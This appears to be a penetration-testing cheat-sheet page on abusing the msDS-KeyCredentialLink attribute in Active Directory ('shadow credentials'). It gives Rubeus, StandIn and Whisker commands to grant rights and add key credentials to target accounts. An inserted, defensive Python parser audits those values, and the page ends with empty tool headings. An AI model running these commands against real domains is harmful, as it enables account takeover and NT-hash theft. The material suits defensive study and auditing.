Key Credentials Abuse

"...if you can write to the msDS-KeyCredentialLink property of a user, you can retrieve the NT hash of that user." (Elad Shamir, refarrow-up-right)

That makes GenericWrite on a user effectively equivalent to a DCSync right over that user.

Note: remember that WriteDacl != GenericWrite, so in order to modify msDS-KeyCredentialLink, obtain the necessary privileges first. For example, using StandIn:

Cmd > Rubeus.exe createnetonly /program:cmd.exe /show /ticket:tgt.kirbi
Cmd > StandIn.exe --domain megacorp.local --object "samaccountname=snovvcrash" --grant "MEGACORP\jdoe" --type GenericAll

Check for the existence of the msDS-KeyCredentialLink property in the LDAP schema with powerview.py:

PS > Get-DomainObject -SearchBase CN=Schema,CN=Configuration,DC=megacorp,DC=local -Properties lDAPDisplayName -Where "lDAPDisplayName contains msDS-KeyCredentialLink"

Whisker

List all the values of the msDS-KeyCredentialLink attribute of a target object:

Cmd > .\Whisker.exe list /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local

Add a new value to the msDS-KeyCredentialLink attribute of a target object:

Cmd > .\Whisker.exe add /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local /path:C:\Temp\cert.pfx /password:Passw0rd!

Remove a value from the msDS-KeyCredentialLink attribute of a target object:

Cmd > .\Whisker.exe remove /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local /deviceid:00ff00ff-00ff-00ff-00ff-00ff00ff00ff

Clear all the values of the msDS-KeyCredentialLink attribute of a target object:
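The values that `Whisker list` enumerates are LDAP DN-with-Binary strings ("B:<hexlen>:<hex>:<DN>") wrapping a KEYCREDENTIALLINK_BLOB as laid out in MS-ADTS 2.2.20: a 4-byte version followed by (length, identifier, value) entries such as KeyID, DeviceId and KeyCreationTime. The following is an added audit helper, not code from the original page, from Whisker or from pywhisker: it parses such a value offline and reports the DeviceId and creation time of each entry, which is what a defender reviewing unexpected key registrations on an account (or checking that a cleanup really removed them) wants to see. The sample value is constructed here rather than captured from a real directory, and the function names (`summarise`, `parse_key_credential_blob`, `is_well_formed`) are this example's own.

```python
"""Parse msDS-KeyCredentialLink values and summarise the KEYCREDENTIALLINK_BLOB
inside each one (layout per MS-ADTS 2.2.20), for auditing which key/device
entries are registered on an account and when they were created."""
import struct
import uuid
from datetime import datetime, timedelta, timezone

# Entry identifiers defined in MS-ADTS 2.2.20 for KEYCREDENTIALLINK_ENTRY.
ENTRY_NAMES = {
    0x01: "KeyID",
    0x02: "KeyHash",
    0x03: "KeyMaterial",
    0x04: "KeyUsage",
    0x05: "KeySource",
    0x06: "DeviceId",
    0x07: "CustomKeyInformation",
    0x08: "KeyApproximateLastLogonTimeStamp",
    0x09: "KeyCreationTime",
}

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(raw: bytes) -> datetime:
    """Convert an 8-byte little-endian FILETIME (100 ns ticks since 1601) to a UTC datetime."""
    (ticks,) = struct.unpack("<Q", raw)
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def datetime_to_filetime(dt: datetime) -> bytes:
    """Inverse of filetime_to_datetime, using integer arithmetic to stay exact."""
    delta = dt - FILETIME_EPOCH
    ticks = (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10
    return struct.pack("<Q", ticks)


def parse_dn_binary(value: str):
    """Split a DN-with-Binary string 'B:<hexlen>:<hex>:<DN>' into (blob bytes, DN)."""
    tag, hexlen, hexdata, dn = value.split(":", 3)
    if tag != "B" or int(hexlen) != len(hexdata):
        raise ValueError("not a well-formed DN-with-Binary value")
    return bytes.fromhex(hexdata), dn


def parse_key_credential_blob(blob: bytes) -> dict:
    """Walk the blob: 4-byte version, then entries of (length:2, identifier:1, value)."""
    if len(blob) < 4:
        raise ValueError("blob too short for a version field")
    (version,) = struct.unpack("<I", blob[:4])
    entries = {"Version": version}
    off = 4
    while off < len(blob):
        if off + 3 > len(blob):
            raise ValueError("truncated entry header at offset %d" % off)
        length, ident = struct.unpack("<HB", blob[off:off + 3])
        value = blob[off + 3:off + 3 + length]
        if len(value) != length:
            raise ValueError("truncated entry value at offset %d" % off)
        name = ENTRY_NAMES.get(ident, "Unknown(0x%02x)" % ident)
        if ident == 0x06 and length == 16:          # DeviceId is a mixed-endian GUID
            entries[name] = str(uuid.UUID(bytes_le=value))
        elif ident in (0x08, 0x09) and length == 8:  # timestamps are FILETIME
            entries[name] = filetime_to_datetime(value)
        elif ident == 0x04 and length == 1:          # KeyUsage is a single byte
            entries[name] = value[0]
        else:                                        # keep everything else as hex
            entries[name] = value.hex()
        off += 3 + length
    return entries


def is_well_formed(blob: bytes) -> bool:
    """True when the blob parses without a truncated entry."""
    try:
        parse_key_credential_blob(blob)
        return True
    except ValueError:
        return False


def summarise(value: str) -> dict:
    """Parse one attribute value into a dict of entry name -> decoded value, plus the DN."""
    blob, dn = parse_dn_binary(value)
    info = parse_key_credential_blob(blob)
    info["DN"] = dn
    return info


def _entry(ident: int, value: bytes) -> bytes:
    return struct.pack("<HB", len(value), ident) + value


# Constructed sample value (not from a real directory); key material is omitted and
# the KeyID is zeroed, since only the DeviceId and timestamps matter for this audit.
SAMPLE_DEVICE_ID = uuid.UUID("00ff00ff-00ff-00ff-00ff-00ff00ff00ff")
SAMPLE_CREATED = datetime(2021, 6, 1, 12, 0, 0, tzinfo=timezone.utc)
SAMPLE_BLOB = (
    struct.pack("<I", 0x200)                        # version 0x00000200
    + _entry(0x01, bytes(32))                       # KeyID (SHA-256 of key material)
    + _entry(0x04, b"\x01")                         # KeyUsage 0x01 = NGC
    + _entry(0x06, SAMPLE_DEVICE_ID.bytes_le)       # DeviceId
    + _entry(0x09, datetime_to_filetime(SAMPLE_CREATED))  # KeyCreationTime
)
SAMPLE_VALUE = "B:%d:%s:CN=WS01,CN=Computers,DC=megacorp,DC=local" % (
    len(SAMPLE_BLOB.hex()), SAMPLE_BLOB.hex())

if __name__ == "__main__":
    for name, val in summarise(SAMPLE_VALUE).items():
        print("%-34s %s" % (name, val))
```

Feeding the parser with values pulled from LDAP (for example the raw attribute returned by powerview.py) lets you diff the registered DeviceIds and creation times against the devices you expect to be enrolled; an entry on a server or service account that has never done a Windows Hello for Business or NGC enrolment is the anomaly worth investigating, ideally alongside directory-change auditing on that attribute.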

pywhisker

Certipy

Tools
